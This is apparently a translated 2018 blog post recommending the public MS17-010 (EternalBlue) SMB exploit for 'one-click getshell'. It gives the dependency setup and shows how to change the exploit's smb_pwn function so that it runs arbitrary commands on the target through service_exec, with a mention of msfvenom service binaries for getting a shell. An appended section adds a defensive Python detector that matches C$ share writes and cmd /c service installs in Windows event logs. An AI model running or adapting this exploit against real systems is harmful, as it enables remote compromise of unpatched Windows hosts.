Must-have tools: an SMB exploitation tool

Author: 身自在 | Source: published 2018-05-03 22:33, read 101 times

I'd like to recommend an SMB exploitation tool for MS17-010 that I have been using all along; in my view it is very handy and gives a one-click getshell.
https://www.exploit-db.com/exploits/42315/
It also needs one module file: https://github.com/worawit/MS17-010/blob/master/mysmb.py
Environment setup

pip install impacket
pip install pycrypto
error: Microsoft Visual C++ 9.0 is required (if you hit this error, install VC++ 9.0 for Python first)
pip install pyasn1

The exploit code only needs a small modification.

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    
    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)
    
    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."

Comment out the default file creation and replace it with direct command execution.

def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    
    #print('creating file c:\\pwned.txt on the target')
    #tid2 = smbConn.connectTree('C$')
    #fid2 = smbConn.createFile(tid2, '/pwned.txt')
    #smbConn.closeFile(tid2, fid2)
    #smbConn.disconnectTree(tid2)
    
    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    service_exec(conn, r'cmd /c xxxxxx')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is
    # executing binary generated by "msfvenom -f exe-service ..."
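As an added example that is not part of the original post: the defender's view of the two behaviours the modified exploit produces on the target, a write to the C$ administrative share and a newly installed service whose binary is a command shell, run over constructed Windows event records. Field names follow the Windows event schema (7045 service installation, 5145 network share file access); the JSON-lines layout, hostnames, IPs and values are assumptions made for this example.

```python
import json
import re

# Constructed sample telemetry for this example (not real logs). Event 7045 (System log)
# is "A service was installed"; 5145 (Security log) is a file access through a network
# share. Field names follow the Windows event schema; hostnames, IPs and values are made up.
SAMPLE_EVENTS = r"""
{"EventID": 5145, "Computer": "WS01", "IpAddress": "10.0.0.5", "ShareName": "\\\\*\\C$", "RelativeTargetName": "pwned.txt", "AccessMask": "0x2"}
{"EventID": 5145, "Computer": "WS01", "IpAddress": "10.0.0.9", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc", "AccessMask": "0x12019f"}
{"EventID": 7045, "Computer": "WS01", "ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe", "StartType": "auto start"}
{"EventID": 7045, "Computer": "WS01", "ServiceName": "svcA1B2", "ImagePath": "%COMSPEC% /Q /c cmd /c whoami", "StartType": "demand start"}
"""

# Administrative shares that expose the whole system drive or %SystemRoot%.
ADMIN_SHARE_RE = re.compile(r"\\(C|ADMIN)\$$", re.IGNORECASE)
# A service whose binary is the command interpreter itself (cmd /c ...), which is what
# a "service exec" style one-off command over an SMB admin session looks like.
SHELL_SERVICE_RE = re.compile(r"(%COMSPEC%|cmd(\.exe)?)\s+(/\S+\s+)*/c\b", re.IGNORECASE)
WRITE_BITS = 0x2 | 0x4  # FILE_WRITE_DATA | FILE_APPEND_DATA in the 5145 AccessMask


def detect(event_lines):
    """Return one alert dict per suspicious event, in input order."""
    alerts = []
    for line in event_lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        eid = ev.get("EventID")
        if eid == 5145 and ADMIN_SHARE_RE.search(ev.get("ShareName", "")):
            # Write access to a file under C$/ADMIN$ over the network: the exploit's
            # createFile('/pwned.txt') on the C$ tree shows up exactly like this.
            if int(ev.get("AccessMask", "0"), 16) & WRITE_BITS:
                alerts.append({"rule": "admin-share-write", "host": ev["Computer"],
                               "source": ev.get("IpAddress"), "detail": ev["RelativeTargetName"]})
        elif eid == 7045 and SHELL_SERVICE_RE.search(ev.get("ImagePath", "")):
            alerts.append({"rule": "shell-as-service", "host": ev["Computer"],
                           "source": ev["ServiceName"], "detail": ev["ImagePath"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS.splitlines()):
        print(a)
```

The legitimate Spooler installation and the IPC$ named-pipe access pass through untouched, so the two rules fire only on the admin-share write and the shell-as-service record.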

Original post: https://www.haomeiwen.com/subject/iuglrftx.html